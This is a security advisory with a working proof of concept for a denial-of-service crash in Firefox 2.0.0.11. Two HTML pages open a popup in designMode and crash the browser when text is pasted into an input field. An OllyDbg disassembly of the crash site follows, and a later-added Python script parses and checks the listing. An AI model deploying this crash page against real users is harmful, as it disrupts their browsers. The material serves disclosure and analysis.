
Firefox 2.0.0.11 INPUT Denial Of Service



Author: Azizov Emin (azizov@xxxxxxxxxxxx)
ITDEFENCE.ru

Denial of service while processing an INPUT element in a document that has
editing mode switched on (designMode = on).

PoC (two files: the launcher page below, and /evl.html after the separator):

<html>
<head>
        <title>!</title>
        <script type='text/javascript'>
        // Launcher: open the target page in a popup, switch the popup's
        // document into editing mode (contentEditable + designMode) and
        // give it focus so the text box in it can receive pasted text.
        function wnd_open(uri, size) {
                var pwin = window.open(uri, '', 'menubar=no,scrollbars=yes,location=no,' + size);
                pwin.document.body.contentEditable = 'true';
                pwin.document.designMode = 'on';
                if (window.focus) { pwin.focus(); }
        }
        </script>
</head>
<body>
        <!-- /evl.html is the second file in this post (after the separator) -->
        <input type='button' name='sb' value='start'
               onclick='wnd_open("/evl.html", "width=550,height=350");'>
</body>
</html>
----------------------------------------------------------------------------------------------------------------
<!--
OllyDbg disassembly of firefox.exe around the point where the debugger stopped
(the instruction marked BREAK below):

005EC769  |> 8B06           MOV EAX,DWORD PTR DS:[ESI]
005EC76B  |. 6A 00          PUSH 0
005EC76D  |. 53             PUSH EBX
005EC76E  |. 56             PUSH ESI
005EC76F  |. FF50 30        CALL DWORD PTR DS:[EAX+30]
005EC772  |> 8B5B 14        MOV EBX,DWORD PTR DS:[EBX+14]
005EC775  |. 5E             POP ESI
005EC776  |. EB 12          JMP SHORT firefox.005EC78A
005EC778  |> 837B 18 00     /CMP DWORD PTR DS:[EBX+18],0
005EC77C  |. 75 09          |JNZ SHORT firefox.005EC787
005EC77E  |. FF75 10        |PUSH DWORD PTR SS:[EBP+10]
005EC781  |. 8B03           |MOV EAX,DWORD PTR DS:[EBX]
005EC783  |. 53             |PUSH EBX
005EC784  |. FF50 28        |CALL DWORD PTR DS:[EAX+28]
005EC787  |> 8B5B 10        |MOV EBX,DWORD PTR DS:[EBX+10]
005EC78A  |> 85DB            TEST EBX,EBX
005EC78C  |.^75 EA          \JNZ SHORT firefox.005EC778
005EC78E  |> 5F             POP EDI
005EC78F  |. 33C0           XOR EAX,EAX
005EC791  |. 5B             POP EBX
005EC792  |. C9             LEAVE
005EC793  \. C2 0C00        RETN 0C
005EC796  /$ 56             PUSH ESI
005EC797  |. 8B7424 08      MOV ESI,DWORD PTR SS:[ESP+8]
005EC79B  |. 57             PUSH EDI                       
005EC79C  |. 8BF9           MOV EDI,ECX                    
005EC79E  |. 8B46 0C        MOV EAX,DWORD PTR DS:[ESI+C]   <-------//BREAK
005EC7A1  |. 85C0           TEST EAX,EAX
005EC7A3  |. 74 09          JE SHORT firefox.005EC7AE
005EC7A5  |. 8B08           MOV ECX,DWORD PTR DS:[EAX]
005EC7A7  |. 50             PUSH EAX
005EC7A8  |. FF91 C0000000  CALL DWORD PTR DS:[ECX+C0]
005EC7AE  |> 8B76 14        MOV ESI,DWORD PTR DS:[ESI+14]
005EC7B1  |. EB 0B          JMP SHORT firefox.005EC7BE
005EC7B3  |> 56             /PUSH ESI
005EC7B4  |. 8BCF           |MOV ECX,EDI
005EC7B6  |. E8 DBFFFFFF    |CALL firefox.005EC796
005EC7BB  |. 8B76 10        |MOV ESI,DWORD PTR DS:[ESI+10]
005EC7BE  |> 85F6            TEST ESI,ESI
005EC7C0  |.^75 F1          \JNZ SHORT firefox.005EC7B3
005EC7C2  |. 5F             POP EDI
005EC7C3  |. 5E             POP ESI
005EC7C4  \. C2 0400        RETN 4
-->
<html>
<head>
        <title>die</title>
        <style type='text/css'>
        .textbox 
        {
                padding: 2px 3px;
        }
        </style>
</head>
<body>
        <!--
                With the page in editing mode, paste text from the clipboard
                into the text box below to trigger the crash.
        -->
        <input name="m_0" value="" class="textbox" size="3" id='boo' type="text">
</body>
</html>
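Added here as a triage aid, not part of the original post or the author's tooling: a small Python parser for OllyDbg listings like the one above. It pulls out the instruction the author marked BREAK and the memory operand it dereferences, lists the indirect (vtable-style) CALL sites, and cross-checks the listing's own consistency (opcode lengths against the listed addresses, decoded branch displacements against the firefox.XXXXXXXX labels). The sample listing is the second routine from the dump above, pasted verbatim; the function names, the Insn record and the handling of the "<---//note" column are my own assumptions about how such a dump is best read.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the routine at 005EC796..005EC7C4 from the listing in
# the post, including OllyDbg's flow glyphs (|. /$ \. ^) and the BREAK note.
SAMPLE_LISTING = """\
005EC796  /$ 56             PUSH ESI
005EC797  |. 8B7424 08      MOV ESI,DWORD PTR SS:[ESP+8]
005EC79B  |. 57             PUSH EDI
005EC79C  |. 8BF9           MOV EDI,ECX
005EC79E  |. 8B46 0C        MOV EAX,DWORD PTR DS:[ESI+C]   <-------//BREAK
005EC7A1  |. 85C0           TEST EAX,EAX
005EC7A3  |. 74 09          JE SHORT firefox.005EC7AE
005EC7A5  |. 8B08           MOV ECX,DWORD PTR DS:[EAX]
005EC7A7  |. 50             PUSH EAX
005EC7A8  |. FF91 C0000000  CALL DWORD PTR DS:[ECX+C0]
005EC7AE  |> 8B76 14        MOV ESI,DWORD PTR DS:[ESI+14]
005EC7B1  |. EB 0B          JMP SHORT firefox.005EC7BE
005EC7B3  |> 56             /PUSH ESI
005EC7B4  |. 8BCF           |MOV ECX,EDI
005EC7B6  |. E8 DBFFFFFF    |CALL firefox.005EC796
005EC7BB  |. 8B76 10        |MOV ESI,DWORD PTR DS:[ESI+10]
005EC7BE  |> 85F6            TEST ESI,ESI
005EC7C0  |.^75 F1          \\JNZ SHORT firefox.005EC7B3
005EC7C2  |. 5F             POP EDI
005EC7C3  |. 5E             POP ESI
005EC7C4  \\. C2 0400        RETN 4
"""


@dataclass
class Insn:
    addr: int
    opcode: bytes
    asm: str
    note: Optional[str] = None        # analyst annotation after "<----//"

    @property
    def mnemonic(self) -> str:
        return self.asm.split()[0]

    @property
    def size(self) -> int:
        return len(self.opcode)


_GLYPHS = "|/\\.^>$ "                 # OllyDbg flow-graph / loop-bracket characters
_MEM_RE = re.compile(r"\[(?P<base>E[A-Z]{2})(?:\+(?P<disp>[0-9A-Fa-f]+))?\]")


def parse_listing(text: str) -> List[Insn]:
    """Parse 'ADDR  glyphs BYTES  ASM  [<---//NOTE]' lines; skip anything else."""
    insns: List[Insn] = []
    for raw in text.splitlines():
        cols = re.split(r"\s{2,}", raw.rstrip())   # columns are 2+ spaces apart
        if len(cols) < 3 or not re.fullmatch(r"[0-9A-Fa-f]{8}", cols[0]):
            continue
        opcode = bytes.fromhex(cols[1].lstrip(_GLYPHS).replace(" ", ""))
        asm = cols[2].lstrip("|/\\").strip()        # drop loop brackets
        note = cols[3].lstrip("<-/ ").strip() if len(cols) > 3 else None
        insns.append(Insn(int(cols[0], 16), opcode, asm, note or None))
    return insns


def mem_operand(asm: str) -> Optional[Tuple[str, int]]:
    """(base register, displacement) of the first [reg+disp] operand, if any."""
    m = _MEM_RE.search(asm)
    return (m.group("base"), int(m.group("disp") or "0", 16)) if m else None


def check_contiguous(insns: List[Insn]) -> List[int]:
    """Addresses whose opcode length does not reach the next listed address."""
    return [a.addr for a, b in zip(insns, insns[1:]) if a.addr + a.size != b.addr]


def branch_target(insn: Insn) -> Optional[int]:
    """Decode E8 (call rel32), EB (jmp rel8) and 70-7F (jcc rel8) targets."""
    op, nxt = insn.opcode, insn.addr + insn.size
    if op[0] == 0xE8 and len(op) == 5:
        return nxt + int.from_bytes(op[1:5], "little", signed=True)
    if (op[0] == 0xEB or 0x70 <= op[0] <= 0x7F) and len(op) == 2:
        return nxt + int.from_bytes(op[1:2], "little", signed=True)
    return None


def check_branch_labels(insns: List[Insn]) -> List[int]:
    """Branches whose decoded target disagrees with OllyDbg's firefox.XXXXXXXX label."""
    bad = []
    for i in insns:
        t, m = branch_target(i), re.search(r"firefox\.([0-9A-Fa-f]{8})", i.asm)
        if t is not None and m and t != int(m.group(1), 16):
            bad.append(i.addr)
    return bad


def indirect_calls(insns: List[Insn]) -> List[Tuple[int, Optional[Tuple[str, int]]]]:
    """CALL DWORD PTR [reg+disp] sites: vtable dispatch through a loaded pointer."""
    return [(i.addr, mem_operand(i.asm)) for i in insns
            if i.mnemonic == "CALL" and "PTR" in i.asm]


def annotated(insns: List[Insn]) -> List[Insn]:
    return [i for i in insns if i.note]


def triage(text: str) -> dict:
    insns = parse_listing(text)
    return {
        "count": len(insns),
        "gaps": check_contiguous(insns),
        "bad_labels": check_branch_labels(insns),
        "break": [(hex(i.addr), i.asm, mem_operand(i.asm)) for i in annotated(insns)],
        "vtable_calls": [(hex(a), op) for a, op in indirect_calls(insns)],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LISTING).items():
        print(f"{key}: {value}")
```

Run stand-alone it reports the BREAK instruction as a read through ESI+0xC and the single vtable call at 005EC7A8 through ECX+0xC0, with no address gaps and no mislabelled branches, which is a cheap way to confirm a pasted listing was not mangled in transit before reasoning about it.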